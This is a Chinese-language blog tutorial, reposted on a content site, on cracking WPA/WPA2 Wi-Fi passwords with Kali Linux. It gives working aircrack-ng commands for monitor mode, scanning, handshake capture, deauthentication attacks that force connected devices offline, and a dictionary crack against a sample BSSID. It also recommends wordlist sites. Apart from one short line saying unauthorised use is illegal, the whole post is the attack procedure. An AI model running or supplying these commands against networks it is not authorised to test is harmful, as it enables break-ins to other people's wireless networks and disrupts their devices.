admin管理员组文章数量:1619289
一.连接无线网卡
Ifconfig
需要买支持监听的外置网卡
一般能看到wlan0,这个就是外置网卡
二.启动监听程序
airmon-ng start wlan0
Ifconfig
检查一下是否开启监听,如图显示就证明开启监听
三.展开 WiFi 扫描
airodump-ng wlan0mon
BSSID,CH,ESSID是之后会用到的
- BSSID:AP(接入点)端的MAC地址。
- PWR:信号强度,一般来说数值越高信号越好。
- Beacons:AP发出的通告编号,每个接入点在最低速率(1m)时差不多每秒发送10个左右的beacon。
- #Data:对应路由的吞吐量,数据越大说明正常使用下该网络的数据上传量越大。
- #/s:最近10秒钟内每秒数据包的数量。
- CH:信道,即对应路由器所在的频道。
- MB:连接速度或AP支持的最大速率。例如,mb=11表示是802.11b;mb=22表示是802.11b+;mb>22表示是802.11g。
- ENC:使用的加密算法体系,如WEP、WPA、WPA2等。
- CIPHER:检测到的加密算法。
- AUTH:使用的认证协议,常见的如+mgt(表示WPA/WPA2使用独立认证的服务器,常见的有802.1x、radius、eap等)、+ska(WEP的共享密钥)、+opn(WEP开放式)。
- ESSID:对应路由器的名称。
- STATION:客户端的MAC地址。
- ESSID:对应路由器的名称。
四.实施抓包操作(抓取握手包)
airodump-ng -c 11 --bssid 对方的地址(就是BSSID) -w hach wlan0mon
-c后面是第三步CH下面的数值
--bssid是对方的地址
-w是要存的抓包的文件名
如图就算抓包成功
大概率不可能正好有设备刚连接,这时候就要用下一步的方法把已连接的设备踢出。
如果抓包的时候STATION下面是空的,就说明没有设备连接这个路由器
五.将对方强制下线
将已连接的设备踢出,然后对方设备重连,这样才可以抓包成功
aireplay-ng -0 10 -a 自己的地址 -c 对方的地址 wlan0mon
10是攻击次数,可以根据需求增大
如果上面的命令之后显示“no such bssid available”
可以试一下加个-D
aireplay-ng -0 10 -a 自己的地址 -c 对方的地址 -D wlan0mon
六.进行跑包
aircrack-ng -a2 -b 对方路由器的地址 -w 字典的路径 抓包的文件
aircrack-ng -a2 -b 90:65:84:2E:0F:2C -w /usr/share/wordlists hach2*.cap
/usr/share/wordlists 这个kali自己的字典
跑包能成功取决于你的字典包含不包含密码,要是一个很全的密码字典,要跑的时间很长。
如图就是跑包成功,可以看到密码
请注意,在未经授权的情况下使用此类工具扫描他人的无线网络是不合法和不道德的行为,请确保仅在合法合规且获得授权的情况下使用。
欢迎一起讨论!
七.常用的字典网站
推荐一个字典网站
弱通 (weakpass)
网上可以搜到好多现成的字典和生成工具
感谢这两个博主:
梦泽贝壳网_欣缘科技 (mzbky)
有关在使用aireplay-ng处理5Ghz频段的wifi时出现“No such Bssid available”的解决方法 - 锤子猫 - 博客园 (cnblogs)
版权声明:本文标题:kali破解WIFI(详细版) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dianzi/1728799236a1174326.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论